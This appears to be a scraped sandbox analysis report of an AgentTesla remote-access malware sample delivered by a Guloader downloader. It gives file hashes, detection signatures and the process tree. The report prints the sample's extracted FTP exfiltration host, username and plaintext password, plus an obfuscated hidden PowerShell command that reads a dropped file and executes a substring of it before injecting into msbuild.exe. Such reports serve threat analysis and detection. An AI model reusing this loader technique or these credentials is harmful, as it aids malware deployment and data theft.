Analysis
-
max time kernel
141s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
08-12-2023 02:17
Static task
static1
Behavioral task
behavioral1
Sample
844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
Resource
win10v2004-20231127-en
General
-
Target
844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
-
Size
699KB
-
MD5
9444e71802e12684478363233fd62c92
-
SHA1
f2b4bd9162b591b2a2f4202934145864e16053fb
-
SHA256
844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41
-
SHA512
fec573d2b453086f2ed0b8b11824e4626fb3712134a707f100b9b2704c489fffc1259646979b0c7ebeb032421163b35beed13d2772ac02a7dd08bf7723821805
-
SSDEEP
12288:WwFGHEXEzFGj9F5qx5DJlm2HlzYmdMylgimtdYM3O0V7bbJ:W5HEXl9y1lrz7lgZtub0V7B
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.vvspijkenisse.nl - Port:
21 - Username:
[email protected] - Password:
playingboyz231
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1704 msbuild.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2528 powershell.exe 1704 msbuild.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2528 set thread context of 1704 2528 powershell.exe 31 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Kldebonnets.kod 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe File opened for modification C:\Program Files (x86)\Common Files\integraltegnets\substrate.Ski 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe File created C:\Program Files (x86)\cockling.lnk 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe File opened for modification C:\Program Files (x86)\cockling.lnk 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Calottes.Doo 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe File opened for modification C:\Windows\bagvognen.lnk 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe File created C:\Windows\bagvognen.lnk 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 2528 powershell.exe 1704 msbuild.exe 1704 msbuild.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2528 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 1704 msbuild.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1560 wrote to memory of 2528 1560 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe 28 PID 1560 wrote to memory of 2528 1560 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe 28 PID 1560 wrote to memory of 2528 1560 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe 28 PID 1560 wrote to memory of 2528 1560 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe 28 PID 2528 wrote to memory of 1704 2528 powershell.exe 31 PID 2528 wrote to memory of 1704 2528 powershell.exe 31 PID 2528 wrote to memory of 1704 2528 powershell.exe 31 PID 2528 wrote to memory of 1704 2528 powershell.exe 31 PID 2528 wrote to memory of 1704 2528 powershell.exe 31 PID 2528 wrote to memory of 1704 2528 powershell.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe"C:\Users\Admin\AppData\Local\Temp\844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Obscurantic=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple';$Ejendomsselskab=$Obscurantic.SubString(49841,3);.$Ejendomsselskab($Obscurantic)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32B
MD5a8ca1db6ae34f5e5c152094f44f92476
SHA19fe0fd4e6907c4f9099d2533c3bade4ffa0968e7
SHA2561f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3
SHA512e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a
-
Filesize
299KB
MD5740aba5e4e37d6e24e6322b0fb20b7e7
SHA16b92a45c9b518e1fe51192c27bd81db51f2b90d4
SHA256a47e49459ad8874693970dbe048982e5afd0ffee2644e03a3ac147be2d012609
SHA5122aca469279d46bbfc84fac52ee8ebdf8b58256f9009e7651480bc8d0fb07327107ee71e526783e8553e499f38a4b977de3e3fdadd4bbda9c8df37423a21c81f3
-
Filesize
48KB
MD5b37bbcef093ffdd4c3be4dc919f6e830
SHA15ef5132e6f4021d672ba3844d2542e2258d22b72
SHA2560c0dcc2234bc3f9baf5c35eb8ea2a77ca0e93015a6cb05de69890893a4b6daad
SHA5129e8a8e2b84f366c0fc2edfa43c6781e88f99621549f0564efadd9d8facc975d1bbab048663b7c6e13ff53444d4f98d058664040dd6c67fde01a7500f38f3a9ba